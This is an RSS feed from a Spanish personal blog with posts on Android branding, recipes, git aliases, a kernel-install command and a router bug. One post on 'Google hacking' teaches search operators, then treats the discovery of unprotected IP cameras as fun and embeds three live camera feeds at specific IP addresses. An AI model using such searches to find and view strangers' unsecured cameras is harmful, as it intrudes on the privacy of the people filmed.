<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>javikal.org</title>
	<atom:link href="http://blog.javikal.org/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.javikal.org</link>
	<description>Blog de javikal</description>
	<lastBuildDate>Wed, 06 Mar 2013 20:28:27 +0000</lastBuildDate>
	<language>es-ES</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.4.2</generator>
		<item>
		<title>¿Google dejará de utilizar Android?</title>
		<link>http://blog.javikal.org/google-dejara-de-utilizar-android/</link>
		<comments>http://blog.javikal.org/google-dejara-de-utilizar-android/#comments</comments>
		<pubDate>Wed, 06 Mar 2013 20:25:23 +0000</pubDate>
		<dc:creator>javikaltxu</dc:creator>
				<category><![CDATA[development]]></category>
		<category><![CDATA[gnu/linux]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[apple]]></category>
		<category><![CDATA[firefoxos]]></category>
		<category><![CDATA[samsung]]></category>
		<category><![CDATA[ubuntuos]]></category>

		<guid isPermaLink="false">http://blog.javikal.org/?p=570</guid>
		<description><![CDATA[Hace unos días he oído hablar sobre Google entorno a la gestión de sus marcas, en este caso reflexiones negativas entorno al nombre del desarrollo del sistema operativo para dispositivos[...]]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p>Hace unos días he oído hablar sobre <a href="http://es.wikipedia.org/wiki/Google" title="Google" target="_blank">Google</a> entorno a la gestión de sus marcas, en este caso reflexiones negativas entorno al nombre del desarrollo del sistema operativo para dispositivos móviles iniciado por google, <a href="http://es.wikipedia.org/wiki/Android" title="Android" target="_blank">Android</a>. </p>
<p>Google pordría dejar de utilizar Android como marca ya que se está viendo que en el mercado muchas compañías como Samsung han incorporado este sistema operativo en su <a href="http://es.wikipedia.org/wiki/Hardware" title="Hardware" target="_blank">hardware</a>. En este sentido, un usuario que adquiere un producto <a href="http://es.wikipedia.org/wiki/Samsung" title="Samsung" target="_blank">Samsung</a>, solo ve un robot de color verde y un sistema operativo que funciona bien, a primera vista, normalmente, el usuario no técnico, solo entiende de usabilidad y asocia al robot de color verde con la marca de hardware, en este caso Samsung. Si el robot de color verde no se llamara Android y se llamara por ejemplo google mobile, Google adquiriría relación directa con el producto de software aunque se estuviera distribuyendo con otro hardware que no fuera de la marca Google, como Samsung, HTC, Huawei, etc&#8230; </p>
<p>Este podría ser uno de los motivos por los que Google quizás decida dejar de utilizar Android como nombre, no el sistema operativo, solo el nombre, con el fin de potenciar su marca de productos y servicios como <a href="http://es.wikipedia.org/wiki/Apple" title="Apple" target="_blank">Apple</a> hace con sus productos y servicios, <a href="http://es.wikipedia.org/wiki/Iphone" title="Iphone" target="_blank">Iphone</a>, por poner un ejemplo.</p>
<p>A continuación os recomiendo encarecidamente visualizar este hangout que habla sobre este tema y, de como este año 2013, se va a suceder una competencia importante ante la aparición de nuevos sistemas operativos como <a href="http://es.wikipedia.org/wiki/Firefox_OS" title="Firefox OS" target="_blank">Firefox OS</a> y <a href="http://www.ubuntu.com/devices/phone" title="Ubuntu for Phones" target="_blank">Ubuntu for Phones</a>, respaldados por proveedores de servicios como Teléfonica o Vodafone.</p>
<p><iframe width="560" height="315" src="http://www.youtube.com/embed/8Fv_YQMI1os" frameborder="0" allowfullscreen></iframe></p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/google-dejara-de-utilizar-android/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>La salsa de los calçots, la salsa romescu</title>
		<link>http://blog.javikal.org/salsa-romescu/</link>
		<comments>http://blog.javikal.org/salsa-romescu/#comments</comments>
		<pubDate>Wed, 06 Mar 2013 19:40:07 +0000</pubDate>
		<dc:creator>javikaltxu</dc:creator>
				<category><![CDATA[recipes]]></category>
		<category><![CDATA[calçots]]></category>
		<category><![CDATA[romescu]]></category>
		<category><![CDATA[salsa]]></category>

		<guid isPermaLink="false">http://blog.javikal.org/?p=562</guid>
		<description><![CDATA[Esta receta es aproximadamente para unos 70 calçots Ingredientes Ñoras: 2 o 3 Tomates maduros: 4 Cabezas de ajo: 1 Almendras tostadas: 1 puño y medio Avellanas tostadas: 1 puño[...]]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p>Esta receta es aproximadamente <strong>para unos 70 calçots</strong></p>
<p><strong>Ingredientes</strong><br />
<a href="http://es.wikipedia.org/wiki/%C3%91oras" title="Ñoras" target="_blank">Ñoras</a>: 2 o 3<br />
Tomates maduros: 4<br />
Cabezas de ajo: 1<br />
Almendras tostadas: 1 puño y medio<br />
Avellanas tostadas: 1 puño<br />
Vinagre: 1 vaso de café<br />
<a href="http://es.wikipedia.org/wiki/Vino_de_Catalu%C3%B1a" title="Vino rancio" target="_blank">Vino rancio</a>: 1 vaso de café<br />
Aceite</p>
<p><strong>Preparación</strong><br />
- Cocemos las ñoras unos 20 minutos.<br />
- Mientras cocemos las ñoras aprovechamos para asar los tomates y la cabeza de ajo.<br />
- Mientras tanto podemos pelar las avellanas y las almendras.<br />
- Una vez peladas las almendras y avellanas las pasamos por el picador con un poco de aceite y hechamos el resultado en un bol donde también mezclaremos el resto de ingredientes.<br />
- A continuación, podemos sacar las ñoras, en caliente deberemos abrirlas y extraer la carne que está pegada a la piel, solo la carne y la ponemos en el bol junto con los frutos secos.<br />
- Aprovechamos para trocear en el bol un diente de ajo crudo también.<br />
- Una vez cocidos los tomates y la cabeza de ajo los pelamos y los vertemos al bol también.<br />
- Ahora toca pasar las turmix, echamos medio vaso de vinagre y un vaso vino rancio y seguimos removiendo con la turmix.<br />
- Finalmente tocará probar, ajustar los sabores y reducir el espesor al gusto, con aceite, vinagre y vino.</p>
<p>Bon Profit!</p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/salsa-romescu/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>git tip, create aliases to reduce writing</title>
		<link>http://blog.javikal.org/git-tip-create-aliases-to-reduce-writing/</link>
		<comments>http://blog.javikal.org/git-tip-create-aliases-to-reduce-writing/#comments</comments>
		<pubDate>Mon, 11 Feb 2013 22:35:57 +0000</pubDate>
		<dc:creator>javikaltxu</dc:creator>
				<category><![CDATA[development]]></category>
		<category><![CDATA[gnu/linux]]></category>
		<category><![CDATA[git]]></category>
		<category><![CDATA[tip]]></category>
		<category><![CDATA[useful]]></category>

		<guid isPermaLink="false">http://blog.javikal.org/?p=543</guid>
		<description><![CDATA[If you are using git from a bash terminal is interesting create aliases to reduce writing and win speed in your operations with this software version control. For example, in your user&#8217;s[...]]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p>If you are using <a title="git in wikipedia" href="http://en.wikipedia.org/wiki/Git_(software)" target="_blank">git</a> from a <a title="bash terminal" href="http://en.wikipedia.org/wiki/Bash_(Unix_shell)" target="_blank">bash</a> terminal is interesting create aliases to reduce writing and win speed in your operations with this software version control.</p>
<p>For example, in your user&#8217;s home directory edit the .profile file and add:</p>
<span class="highlight">alias gpom=&#8217;git push origin master&#8217;</span>
<p>if you don&#8217;t want reboot your computer simply do:</p>
<span class="highlight">source .profile</span> to read the new alias.</p>
<p>At this moment write <em>gpom</em> and <em>git push origin master</em> will be the same, with the alias gpom you&#8217;ll reduce 18 keyboard pulsations.</p>
<p>Here some useful aliases:</p>
<p><em># Aliases for git</p>
<p><span style="font-size: 13px; line-height: 19px;">alias gpom=&#8217;git push origin master&#8217;</span></p>
<p><span style="font-size: 13px; line-height: 19px;">alias gci=&#8217;git commit -a&#8217;</span></p>
<p>alias gadd=&#8217;git add *&#8217;</p>
<p>alias gup=&#8217;git pull&#8217;</em></p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/git-tip-create-aliases-to-reduce-writing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>NO al ACTA</title>
		<link>http://blog.javikal.org/al-acta/</link>
		<comments>http://blog.javikal.org/al-acta/#comments</comments>
		<pubDate>Sun, 29 Jan 2012 10:57:18 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[Sin categoría]]></category>
		<category><![CDATA[acta]]></category>

		<guid isPermaLink="false">http://javikal.org/?p=522</guid>
		<description><![CDATA[Recuerdo a mi madre diciendo: &#8220;&#8230;tienes que compartir los juguetes&#8230;&#8221; ¿ Que es el ACTA ? &#160;]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p>Recuerdo a mi madre diciendo: &#8220;&#8230;tienes que compartir los juguetes&#8230;&#8221;</p>
<p><iframe src="http://www.youtube.com/embed/C7ePr_R_p3c" frameborder="0" width="570" height="365"></iframe></p>
<p>¿ <a title="¿ Qué es el acta?" href="http://es.wikipedia.org/wiki/Acuerdo_comercial_anti-falsificaci%C3%B3n" target="_blank">Que es el ACTA</a> ?</p>
<p>&nbsp;</p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/al-acta/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Arduino, ese gran desconocido</title>
		<link>http://blog.javikal.org/arduino-ese-gran-desconocido/</link>
		<comments>http://blog.javikal.org/arduino-ese-gran-desconocido/#comments</comments>
		<pubDate>Thu, 26 Jan 2012 23:51:15 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[gnu/linux]]></category>
		<category><![CDATA[arduino]]></category>

		<guid isPermaLink="false">http://javikal.org/?p=510</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p><iframe src="http://www.youtube.com/embed/VKRs6boJavE" frameborder="0" width="570" height="365"></iframe></p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/arduino-ese-gran-desconocido/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Instalar la versión 3 del kernel de linux del tirón</title>
		<link>http://blog.javikal.org/instalar-la-version-3-del-kernel-de-linux-del-tiron/</link>
		<comments>http://blog.javikal.org/instalar-la-version-3-del-kernel-de-linux-del-tiron/#comments</comments>
		<pubDate>Wed, 09 Nov 2011 20:03:47 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[gnu/linux]]></category>
		<category><![CDATA[debian]]></category>
		<category><![CDATA[kernel 3.0]]></category>

		<guid isPermaLink="false">http://javikal.org/?p=498</guid>
		<description><![CDATA[Si estas utilizando una versión debian like, es decir, con apt/dpkg, y de arquitectura i386 y quieres probar rapidamente el kernel de linux en su versión 3 aquí va una[...]]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p>Si estas utilizando una versión debian like, es decir, con apt/dpkg, y de arquitectura i386 y quieres probar rapidamente el kernel de linux en su versión 3 aquí va una serie de instrucciones enlazadas para que copies y pegues en tu consola con permisos de administración, le des al enter y&#8230; a probar! :</p>
<pre class="brush: bash; gutter: true">wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.0-oneiric/linux-headers-3.0.0-0300_3.0.0-0300.201107220917_all.deb &amp;&amp;  wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.0-oneiric/linux-headers-3.0.0-0300-generic_3.0.0-0300.201107220917_i386.deb &amp;&amp;  wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.0-oneiric/linux-image-3.0.0-0300-generic_3.0.0-0300.201107220917_i386.deb &amp;&amp; dpkg -i linux-headers-3.0.0-0300_3.0.0-0300.201107220917_all.deb &amp;&amp;  dpkg -i linux-headers-3.0.0-0300-generic_3.0.0-0300.201107220917_i386.deb &amp;&amp;  dpkg -i linux-image-3.0.0-0300-generic_3.0.0-0300.201107220917_i386.deb</pre>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/instalar-la-version-3-del-kernel-de-linux-del-tiron/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Crear un enlace simbólico por ftp usando php</title>
		<link>http://blog.javikal.org/crear-enlace-simbolico-por-ftp-usando-php/</link>
		<comments>http://blog.javikal.org/crear-enlace-simbolico-por-ftp-usando-php/#comments</comments>
		<pubDate>Thu, 03 Nov 2011 21:55:10 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[php]]></category>
		<category><![CDATA[php symlink ftp]]></category>

		<guid isPermaLink="false">http://javikal.org/?p=482</guid>
		<description><![CDATA[Me he encontrado en la situación de tener que crear un enlace simbólico/symlink en una aplicación php que necesita de él para su funcionamiento. Resulta que el acceso al servidor[...]]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p>Me he encontrado en la situación de tener que crear un enlace simbólico/symlink en una aplicación php que necesita de él para su funcionamiento. Resulta que el acceso al servidor se limita al protocolo ftp, por lo que no se puede crear o subir el necesitado enlace simbólico. La solución ha sido utilizar las funciones de php que generan symlinks, subir el código php y ejecutarlo desde el propio navegador por url, las librerías son las siguientes:</p>
<p>http://php.net/manual/es/function.symlink.php</p>
<pre class="brush: php; gutter: true">&lt;?php 
$objetivo = 'themed'; 
$enlace = 'theme'; 
symlink($objetivo, $enlace); 
?&gt;</pre>
<p>como véis son muy fáciles de utilizar&#8230; a mi me ha sacado de un apuro pues no teníamos acceso ssh/sftp para poder crearlo.</p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/crear-enlace-simbolico-por-ftp-usando-php/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cisco epc3825 and CRC problems</title>
		<link>http://blog.javikal.org/cisco-epc3825-crc-problems/</link>
		<comments>http://blog.javikal.org/cisco-epc3825-crc-problems/#comments</comments>
		<pubDate>Fri, 28 Oct 2011 17:49:03 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[health]]></category>
		<category><![CDATA[cisco]]></category>
		<category><![CDATA[crc]]></category>
		<category><![CDATA[epc3825]]></category>
		<category><![CDATA[problem]]></category>

		<guid isPermaLink="false">http://javikal.org/?p=479</guid>
		<description><![CDATA[Recently in my job using MacOSx I discovered -with the help of my peers- an error on the system software updates. Googling and making some calls to our Internet Provider[...]]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p>Recently in my job using MacOSx I discovered -with the help of my peers- an error on the system software updates. Googling and making some calls to our Internet Provider found the problem. </p>
<p>The cisco epc3825 router firmware have a bug managing the CRC of big files. In our particular problem the mac software updates need download files with an important size, when the operating system was installing the updates an error about the files integrity ocourred and the updates were impossible to install. </p>
<p>Other problems with the same source are ocurring in different operating systems, here some links aboute the problem:</p>
<p>http://www.neeo.es/index.php?option=com_content&#038;view=article&#038;id=8023:problemas-con-la-ultima-version-firmware-del-cisco-epc3825-de-ono&#038;catid=1:noticias&#038;Itemid=1381</p>
<p>http://www.redeszone.net/2011/07/17/problemas-con-el-cisco-epc3825-de-ono-con-la-ultima-version-de-firmware/</p>
<p>http://www.hard2mano.com/index.php?showtopic=91915</p>
<p>Finally the trouble was resolved changing the router by our Internet Provider which had the problem documented, free of course.</p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/cisco-epc3825-crc-problems/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Trucos y tips para buscar en google I aka Google hacking</title>
		<link>http://blog.javikal.org/trucos-tips-para-buscar-en-google-aka-google-hacking/</link>
		<comments>http://blog.javikal.org/trucos-tips-para-buscar-en-google-aka-google-hacking/#comments</comments>
		<pubDate>Sun, 09 Oct 2011 16:00:43 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[seo]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[google hacking]]></category>
		<category><![CDATA[tips]]></category>
		<category><![CDATA[trucos]]></category>

		<guid isPermaLink="false">http://javikal.org/?p=156</guid>
		<description><![CDATA[En el siguiente artículo relataré brevemente las posibilidades que nos ofrece google para realizar búsquedas, combinadas con un poco de ingeniería social, con el fin de filtrar un poco más[...]]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p>En el siguiente artículo relataré brevemente las posibilidades que nos ofrece google para realizar búsquedas, combinadas con un poco de ingeniería social, con el fin de filtrar un poco más nuestra búsqueda, afinar la puntería ante tal bastión de información de todo tipo que inunda la red de redes.</p>
<p>Un poquito de <strong>técnica</strong> no nos vendrá nada mal:</p>
<p>Las <strong>comillas dobles</strong>:<br />
<a href="http://www.google.com/search?client=ubuntu&#038;channel=fs&#038;q=%22mi+patr%C3%B3n+de+b%C3%BAsqueda%22&#038;ie=utf-8&#038;oe=utf-8" title="google hacking" target="_blank">&#8220;mi patrón de búsqueda&#8221;</a><br />
Nos encontrará exactamente páginas que contengan lo que pongamos entre las comillas dobles. Si pusiéramos el patrón de búsqueda sin las comillas dobles nos encontraría páginas que contuviesen esas dos palabras independientemente de si se están unidas o no, es decir, pueden estar disueltas en todo el contenido de la página.</p>
<p>Los<strong> dos puntos seguidos</strong>:<br />
Nos permite establecer rangos de números en nuestras búsquedas, por ejemplo si quisiéramos buscar la publicación de algún exploit para windows entre 1990 y 1993 lo haríamos así:<span id="more-156"></span><br />
<a href="http://www.google.com/search?client=ubuntu&#038;channel=fs&#038;q=%22exploit+for+windows%22+1990..1993&#038;ie=utf-8&#038;oe=utf-8" title="google hacking" target="_blank">&#8220;exploit for windows&#8221; 1990..1993</a><br />
Aunque no nos encuentre nada entre ese rango de números google suele entender que estas buscando un rango de fechas por lo que te muestra alguna coincidencia de alguno de los elementos del rango, muy útil si son fechas lo que buscamos.</p>
<p>Los <strong>comodines</strong>:<br />
Podemos utilizar los asteriscos como comodines, por ejemlo: <a href="http://www.google.com/search?client=ubuntu&#038;channel=fs&#038;q=%22mi+patr%C3%B3n+de+b%C3%BAsqueda%22&#038;ie=utf-8&#038;oe=utf-8#sclient=psy-ab&#038;hl=es&#038;client=ubuntu&#038;hs=3Td&#038;channel=fs&#038;source=hp&#038;q=%22en+un+lugar+de+la+*%22&#038;pbx=1&#038;oq=%22en+un+lugar+de+la+*%22&#038;aq=f&#038;aqi=g4&#038;aql=&#038;gs_sm=e&#038;gs_upl=30700l30700l0l31632l1l1l0l0l0l0l230l230l2-1l1l0&#038;bav=on.2,or.r_gc.r_pw.r_cp.,cf.osb&#038;fp=f6a3f63899daddb9&#038;biw=1440&#038;bih=705" title="google hacking" target="_blank">&#8220;en un lugar de la *&#8221;</a> sino recordamos una palabra de una frase nos viene de perlas.</p>
<p>Usar google como <strong>calculadora</strong>:<br />
También podemos utilizar google como calculadora, es un poco absurdo teniendo software de calculadora o nuestros dedos pero realiza los cálculos que le pasemos, en alguna ocasión que necesitemos calcular rapidamente algo y ya estemos con el navegador abierto y en la web de google search puede sernos útil, por ejemplo: <a href="http://www.google.es/#sclient=psy-ab&#038;hl=es&#038;site=&#038;source=hp&#038;q=%2824%2B2%29%2F2+*+2+%2B+4+-+1&#038;pbx=1&#038;oq=%2824%2B2%29%2F2+*+2+%2B+4+-+1&#038;aq=f&#038;aqi=&#038;aql=&#038;gs_sm=e&#038;gs_upl=1339l1339l0l2470l1l1l0l0l0l0l126l126l0.1l1l0&#038;bav=on.2,or.r_gc.r_pw.,cf.osb&#038;fp=655e8d4e7aa14a55&#038;biw=1440&#038;bih=705" title="google hacking" target="_blank">(24+2)/2 * 2 + 4 &#8211; 1</a></p>
<p>Encontrar <strong>definiciones</strong>:<br />
Le podemos pasar como parámetro de búsqueda &#8220;define&#8221; para encontrar definiciones de acrónimos o palabras específicas: <a href="http://www.google.com/search?client=ubuntu&#038;channel=fs&#038;q=define%3ASA&#038;ie=utf-8&#038;oe=utf-8" title="google hacking" target="_blank">define:SA</a></p>
<p>Saber <strong>quien enlaza a quien</strong>:<br />
Podemos utilizar el operador &#8220;link&#8221; para saber quien está enlazando la web o dominio que le pasemos como parámetro: <a href="http://www.google.com/search?client=ubuntu&#038;channel=fs&#038;q=link%3Awikileaks.org&#038;ie=utf-8&#038;oe=utf-8" title="google hacking" target="_blank">link:wikileaks.org</a> nos devuelve aquellas publicaciones, o webs que contienen un enlace a wikileaks.org</p>
<p>Buscar en la <strong>etiqueta title</strong> de las webs:<br />
Podemos filtrar nuestros resultados buscando en la etiqueta title de html lo que estamos buscando, por ejemplo si queremos buscar webs que en su title contenga &#8220;como ganar dinero&#8221; lo haremos así: <a href="http://www.google.com/search?client=ubuntu&#038;channel=fs&#038;q=intitle%3A%22como+ganar+dinero+sin+trabajar%22&#038;ie=utf-8&#038;oe=utf-8" title="google hacking" target="_blank">intitle:&#8221;como ganar dinero sin trabajar&#8221;</a></p>
<p>Filtrar <strong>por nivel de dominio</strong>:<br />
Consiste en filtrar por el nivel de dominio, por ejemplo si queremos buscar la palabra javikal en dominios .com lo haremos así: <a href="http://www.google.com/search?client=ubuntu&#038;channel=fs&#038;q=javikal+site%3Acom&#038;ie=utf-8&#038;oe=utf-8" title="google hacking" target="_blank">javikal site:com</a></p>
<p>Busquedas en las url (direcciones):<br />
Existe otro operador que nos permite filtrar buscando nuestro patrón en las direcciones/dominios de Internet, por ejemplo, si quiero buscar un dominio que contenga las palabras crisis culpables lo podemos hacer de la siguiente manera: <a href="http://www.google.com/search?client=ubuntu&#038;channel=fs&#038;q=+inurl%3Acrisisculpables&#038;ie=utf-8&#038;oe=utf-8" title="google hacking" target="_blank">inurl:crisisculpables</a></p>
<p>Algunos <strong>ejemplos</strong> prácticos:<br />
Combinando los operadores básicos que tenemos a nuestra disposición para filtar las búsquedas y un poco de imaginación podemos encontrar cosas realmente intereseantes como:</p>
<p><strong>Cámaras IP sin protección</strong> con acceso a visualización o incluso con acceso a los controles de la cámara, alucinante y muy divertido. Esto es gracias a la conjugación de operadores de google con conocimientos técnicos, sabiendo las <a href="http://es.wikipedia.org/wiki/Localizador_uniforme_de_recursos" title="google hacking" target="_blank">urls</a> que generan ciertas cámaras ip podemos buscar en google esas urls y encontrar cosas como estas:</p>
[iframe http://81.204.247.130:6112/ 800 600]
[iframe http://72.237.37.82:8080/view/view.shtml 800 600]
[iframe http://24.249.24.110:2001/view/view.shtml 800 600]
<p>Ahora vamos a buscar, a modo de ejemplo, <strong>material en pdf sobre google hacking posteado este año 2011</strong>:<br />
<a href="http://www.google.com/search?client=ubuntu&#038;channel=fs&#038;q=%22google+hacking%22+pdf+2011&#038;ie=utf-8&#038;oe=utf-8" title="google hacking" target="_blank">&#8220;google hacking&#8221; pdf 2011</a></p>
<p>Como habréis observado la potencia reside en la conjugación de ingeniería social con técnicas de búsqueda básicas.</p>
<p><strong>Enlaces de interés:</strong><br />
<a href="http://www.googleguide.com/advanced_operators.html" title="google hacking" target="_blank">http://www.googleguide.com/advanced_operators.html</a><br />
<a href="http://en.wikipedia.org/wiki/Google_hacking" title="google hacking" target="_blank">http://en.wikipedia.org/wiki/Google_hacking</a><br />
<a href="http://es.wikipedia.org/wiki/Ingenier%C3%ADa_social_%28seguridad_inform%C3%A1tica%29" title="google hacking" target="_blank">http://es.wikipedia.org/wiki/Ingenier%C3%ADa_social_%28seguridad_inform%C3%A1tica%29</a><br />
<a href="http://www.segu-info.com.ar/articulos/42-google-hacking.htm" title="google hacking" target="_blank">http://www.segu-info.com.ar/articulos/42-google-hacking.htm</a><br />
<a href="http://www.acunetix.com/websitesecurity/google-hacking.htm" title="google hacking" target="_blank">http://www.acunetix.com/websitesecurity/google-hacking.htm</a><br />
<a href="http://johnny.ihackstuff.com/" title="google hacking" target="_blank">http://johnny.ihackstuff.com/</a><br />
<a href="http://www.stachliu.com/resources/tools/google-hacking-diggity-project/attack-tools/" title="google hacking" target="_blank">http://www.stachliu.com/resources/tools/google-hacking-diggity-project/attack-tools/</a><br />
<a href="http://www.i-hacked.com/content/view/81/42/" title="google hacking" target="_blank">http://www.i-hacked.com/content/view/81/42/</a></p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/trucos-tips-para-buscar-en-google-aka-google-hacking/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>De la mar el mero&#8230;</title>
		<link>http://blog.javikal.org/de-la-mar-el-mero/</link>
		<comments>http://blog.javikal.org/de-la-mar-el-mero/#comments</comments>
		<pubDate>Sun, 09 Oct 2011 15:46:33 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[recipes]]></category>
		<category><![CDATA[sayings]]></category>

		<guid isPermaLink="false">http://javikal.org/?p=438</guid>
		<description><![CDATA[de la mar el mero y de la tierra el cordero]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p>de la mar el mero<br />
y de la tierra el cordero</p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/de-la-mar-el-mero/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Zancarron guisado</title>
		<link>http://blog.javikal.org/zancarron-guisado/</link>
		<comments>http://blog.javikal.org/zancarron-guisado/#comments</comments>
		<pubDate>Sun, 09 Oct 2011 15:44:49 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[recipes]]></category>
		<category><![CDATA[guisado]]></category>
		<category><![CDATA[jarrete]]></category>
		<category><![CDATA[zancarron]]></category>

		<guid isPermaLink="false">http://javikal.org/?p=422</guid>
		<description><![CDATA[Ingredientes: Aceite de oliva 500gr de zancarron 2 dientes de ajo 1 zanahoria 1 pimiento verde 2 patatas 1/2 tomate sin piel 1 pasti de starlux vino blanco o coñac[...]]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p><strong>Ingredientes:</strong></p>
<ul>
<li>Aceite de oliva</li>
<li>500gr de <a href="http://es.wikipedia.org/wiki/Jarrete" target="_blank">zancarron</a></li>
<li>2 dientes de ajo</li>
<li>1 zanahoria</li>
<li>1 pimiento verde</li>
<li>2 patatas</li>
<li>1/2 tomate sin piel</li>
<li>1 pasti de starlux</li>
<li>vino blanco o coñac</li>
</ul>
<p><span id="more-422"></span><br />
<strong>Preparación:</strong><br />
<code></p>
<ol>
<li>Pochamos la cebolla, el ajo en láminas y la zanahoria con aceite</li>
<li>Echamos la carne al pochado anterior junto con el pimiento verde debidamente cortado y las patatas cortadas a trozos y lo <a href="http://www.wordreference.com/definicion/rehogar" target="_blank">rehogamos</a> todo</li>
<li>Cuando esté rehogada la carne echamos el medio tomate sin piel y el vino blanco o coñac junto con una pastilla de starlux para que le dé más sabor.
<li>Cerramos la olla y lo dejamos todo 20 minutos</li>
</ol>
<p></code></p>
<p>Onin!</p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/zancarron-guisado/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>La proporción áurea</title>
		<link>http://blog.javikal.org/la-proporcion-aurea/</link>
		<comments>http://blog.javikal.org/la-proporcion-aurea/#comments</comments>
		<pubDate>Thu, 22 Sep 2011 16:09:16 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[design]]></category>

		<guid isPermaLink="false">http://javikal.org/?p=394</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p><iframe class="youtube-player" type="text/html" width="570" height="365" src="http://www.youtube.com/embed/7h8dNH9Xnfg" frameborder="0"><br />
</iframe></p>
<p><iframe class="youtube-player" type="text/html" width="570" height="365" src="http://www.youtube.com/embed/8TOyxTDJX2c" frameborder="0"><br />
</iframe></p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/la-proporcion-aurea/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Recetas de pintxos de Donosti</title>
		<link>http://blog.javikal.org/recetas-de-pintxos-de-donosti/</link>
		<comments>http://blog.javikal.org/recetas-de-pintxos-de-donosti/#comments</comments>
		<pubDate>Fri, 19 Aug 2011 19:15:25 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[recipes]]></category>
		<category><![CDATA[pintxos]]></category>
		<category><![CDATA[pintxos de donosti]]></category>

		<guid isPermaLink="false">http://javikal.org/?p=389</guid>
		<description><![CDATA[Ahí va un pdf completo completo con muchísimos pintxos con denominación de orígen, clicka aquí para descargarlo. Bon profit!]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p>Ahí va un pdf completo completo con muchísimos pintxos con denominación de orígen, clicka <a href="http://javikal.org/pdf/recetas-pintxo-donosti.pdf" title="Recetas de pintxos de Donsti" target="_blank">aquí</a> para descargarlo. Bon profit!</p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/recetas-de-pintxos-de-donosti/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>El poder de las redes sociales</title>
		<link>http://blog.javikal.org/el-poder-de-las-redes-sociales/</link>
		<comments>http://blog.javikal.org/el-poder-de-las-redes-sociales/#comments</comments>
		<pubDate>Fri, 19 Aug 2011 13:47:50 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[health]]></category>
